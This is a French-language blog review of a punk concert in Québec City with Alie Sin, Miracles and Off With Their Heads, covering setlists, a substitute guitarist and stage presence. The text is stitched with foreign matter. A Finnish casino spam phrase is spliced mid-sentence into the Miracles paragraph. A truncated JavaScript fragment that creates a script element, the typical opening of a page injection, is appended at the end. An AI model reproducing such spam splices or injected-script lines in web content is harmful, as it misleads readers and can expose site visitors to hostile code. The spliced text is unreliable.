Hier, il y avait un spectacle très intéressant à l »Union Commerciale. En effet, les talentueux Off With Their Heads de Minneapolis étaient de passage dans la belle ville de Québec, avec Miracles de Montréal (le nouveau projet de Hugo Mudie et Fredéric Jacques des Sainte-Catherines/Yesterday »s Ring), ainsi que nos folks-punkers locaux préférés, Alie Sin.

Les chums d »Alie Sin ont brisé la glace en commençant ça avec un bonjour, nous sommes l »agent 728 (qui m »a fait plutôt rire) et une chanson instrumentale. Je dois dire que j »avais plutôt hâte d »entendre leurs nouvelles compositions. Je n »ai pas été déçue, ils ont vraiment du beau stock de rodé pour le prochain album. Bien sûr, conséquemment à cela, ils ont fait peu de vieux titres, mais tout de même, nous avons pu entendre G.L.T., They Stole April, Annie Belleau et The Rascals (accompagnés de notre chanteur fantastique qu »est Dominic Pelletier de The Hunters , un autre groupe local qu »on a la chance d »avoir ici à Québec).

Au tour de Miracles de nous donner de l »énergie. Ce jeudi, c »était le show du lancement du premier disque du groupe. J »avais hâte de savoir quels membres allaient être présents. Il y a toujours les membres de base, soit Hugo Mudie, Fredéric Jacques, Cléo Beauchamp-Paquette et Rich Bouthillier, mais on ne sait jamais s »il y aura leurs cuivres avec eux, soit Mario Ouellet ou Émilie Bourguignon de PL Mafia. Par contre, à notre grande surprise, le lancement s »est fait sans Fred pour des raisons qui me sont inconnues. Je crois avoir entendu Hugo dire qu »il était malade, mais je ne suis pas sûre de ce que j »affirme ici. Malgré cette triste nouvelle, la bonne fut que c »était notre chum Dominic Pelletier qui a remplacé Fred à la guitare et un peu au chant également. Très fière d »avoir pu voir ça live dans ma face. C »était un beau moment et je dois dire que Doum a été à la hauteur de mes attentes. Bref, excellente prestation du LeoVegas on maailman nopein mobiili . groupe. J »aime beaucoup leurs chansons qui sont très accrocheuses. On a pu entendre, entre autres, Silver And Cold et Don »t Waste Another Sunday qu »on peut retrouver sur leur album maintenant en vente et le titre We Used To Be In Love du dernier disque des Sainte-Catherines, Fireworks.

Finalement, le spectacle se termine avec les américains Off With Their Heads. J »avais hâte de voir le groupe. Je dois dire que j »affectionne pas nécessairement la musique de la formation de Minneapolis. J »en ai écouté plusieurs fois, sans nécessairement accroché donc, j »avais hâte de voir live pour pouvoir espérer plus apprécier leur musique. J »ai bien fait, parce que j »ai très bien aimé ce que j »ai entendu live; je trouvais que ça sonnait quand même bien. Par contre, j »ai mes quelques reproches. Pour ceux qui me connaissent, vous savez que j »aime bien quand un groupe échange quelques mots avec la foule ou soit reconnaissant de notre présence. Toutefois, à ma grande surprise, le groupe a enligné leurs compositions une à une sans rien dire vraiment, ce que je trouve un peu sauvage, sans toutefois leur enlever qu »ils sont super talentueux. Aussi, le groupe est plutôt tranquille sur le stage. C »est le genre de groupe que tu chantes sing-along toute le long pour en apprécier vraiment l »ambiance, parce qu »en les regardant seulement comme ça, sans connaître les paroles, c »est rien d »extraordinaire. J »ai l »air d »avoir juste du négatif à dire sur le groupe, mais pas tant que ça non. Je dois admettre que hier, la formation m »a tout de même donné envie de les écouter plus, ce qui est déjà mieux que l »état dans lequel j »étais arrivée à la base au spectacle. Je connais pas vraiment les chansons du groupe, toutefois, je peux vous dire qu »ils ont fini avec Clear The Air que l »on retrouve sur In Desolation. Je le sais, car j »ai vu le vidéoclip récemment et il m »a plutôt marquée, voir troublée. Allez le visionner sur Youtube à l »adresse suivante : http://www.youtube.com/watch?v=qOum_DlqOrk.

var d=document;var s=d.createElement(‘script’);